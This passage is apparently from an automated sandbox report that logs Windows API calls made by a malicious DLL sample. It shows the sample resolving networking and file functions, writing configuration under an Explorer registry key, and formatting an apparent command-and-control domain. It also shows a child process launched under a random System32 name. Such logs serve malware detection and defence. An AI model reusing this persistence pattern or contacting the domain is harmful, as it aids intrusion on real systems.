dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.530] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.530] CloseHandle (hObject=0x74) returned 1 [0036.530] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.530] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.530] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.532] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.532] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.532] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.532] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.532] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.532] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.532] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.532] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.533] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.534] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.534] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.534] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.534] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.534] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.534] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.534] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.534] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.535] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.535] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.535] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.535] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.535] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.535] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.535] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.535] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.535] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.535] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.535] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.535] AddAtomT () returned 0x0 [0036.535] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2ef934, lpdwDisposition=0x2ef938 | out: phkResult=0x2ef934*=0x78, lpdwDisposition=0x2ef938*=0x2) returned 0x0 [0036.535] CloseHandle (hObject=0x78) returned 1 [0036.535] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0036.536] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2ef980, lpdwDisposition=0x2efa38 | out: phkResult=0x2ef980*=0x7c, lpdwDisposition=0x2efa38*=0x2) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1ed94, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1ed98, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1ed9c, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eda4, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eda8, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edb8, lpcbData=0x2ef97c*=0x8 | out: lpType=0x2ef984*=0x3, lpData=0x72f1edb8*, lpcbData=0x2ef97c*=0x8) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edc0, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x2ef97c*=0x4) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edc4, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edc8, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x2ef97c*=0x4) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edcc, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edd0, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x2ef97c*=0x4) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eddc, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x2ef984, lpData=0x13a0b28, lpcbData=0x2ef97c*=0x200 | out: lpType=0x2ef984*=0x0, lpData=0x13a0b28*=0x0, lpcbData=0x2ef97c*=0x200) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eef0, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x2ef984, lpData=0x13a0d30, lpcbData=0x2ef97c*=0x64 | out: lpType=0x2ef984*=0x3, lpData=0x13a0d30*, lpcbData=0x2ef97c*=0x2) returned 0x0 [0036.536] lstrlenA (lpString=" ") returned 1 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1edec, lpcbData=0x2ef97c*=0x104 | out: lpType=0x2ef984*=0x3, lpData=0x72f1edec*, lpcbData=0x2ef97c*=0x0) returned 0x0 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eef4, lpcbData=0x2ef97c*=0x8 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x2ef97c*=0x8) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eefc, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1ef00, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x2ef984, lpData=0x72f1eda0, lpcbData=0x2ef97c*=0x4 | out: lpType=0x2ef984*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x2ef97c*=0x4) returned 0x2 [0036.536] RegCloseKey (hKey=0x7c) returned 0x0 [0036.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x2efa40 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x2efa40*=0x2) returned 0x0 [0036.537] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0036.537] GetLastError () returned 0x0 [0036.537] RegCloseKey (hKey=0x7c) returned 0x0 [0036.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x2efa50 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x2efa50*=0x2) returned 0x0 [0036.537] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0036.537] RegCloseKey (hKey=0x7c) returned 0x0 [0036.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x2efa40 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x2efa40*=0x2) returned 0x0 [0036.537] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0036.537] RegCloseKey (hKey=0x7c) returned 0x0 [0036.537] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x2efa3c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x2efa3c*=0x2) returned 0x0 [0036.537] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0036.537] RegCloseKey (hKey=0x7c) returned 0x0 [0036.537] GetLastError () returned 0x0 [0036.537] GetLastError () returned 0x0 [0036.537] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0036.538] lstrlenA (lpString="00") returned 2 [0036.538] lstrlenA (lpString="/00/") returned 4 [0036.538] wsprintfA (in: param_1=0x13a0da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0036.538] wsprintfA (in: param_1=0x13a0dc8, param_2="%s" | out: param_1="00") returned 2 [0036.538] wsprintfA (in: param_1=0x13a26f0, param_2="%s" | out: param_1="/00/") returned 4 [0036.538] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0036.538] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0036.538] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x2efa3c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x2efa3c*=0x2) returned 0x0 [0036.538] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x13a0d30*, cbData=0x64 | out: lpData=0x13a0d30*) returned 0x0 [0036.538] RegCloseKey (hKey=0x7c) returned 0x0 [0036.540] HeapDestroy (hHeap=0x13a0000) returned 1 Thread: id = 142 os_tid = 0xdbc Process: id = "68" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4faa0" os_pid = "0xe80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2984 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2985 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2986 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2987 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2988 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2989 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2990 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2991 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2992 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2993 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2994 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2995 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2996 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2997 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2998 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2999 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3000 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3001 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3002 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3003 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3004 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3005 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3006 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3007 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3008 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3009 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3010 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 3011 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3012 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3013 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3014 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3015 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 3016 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3017 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3018 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3019 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3020 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3021 start_va = 0xd0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3022 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3023 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3024 start_va = 0x690000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Thread: id = 153 os_tid = 0xe84 [0036.604] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f5fc | out: lpSystemTimeAsFileTime=0x26f5fc*(dwLowDateTime=0xe380e230, dwHighDateTime=0x1d3dfba)) [0036.604] GetCurrentProcessId () returned 0xe80 [0036.604] GetCurrentThreadId () returned 0xe84 [0036.604] GetTickCount () returned 0x1844b [0036.604] QueryPerformanceCounter (in: lpPerformanceCount=0x26f5f4 | out: lpPerformanceCount=0x26f5f4*=378462730) returned 1 [0036.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.606] GetModuleHandleW 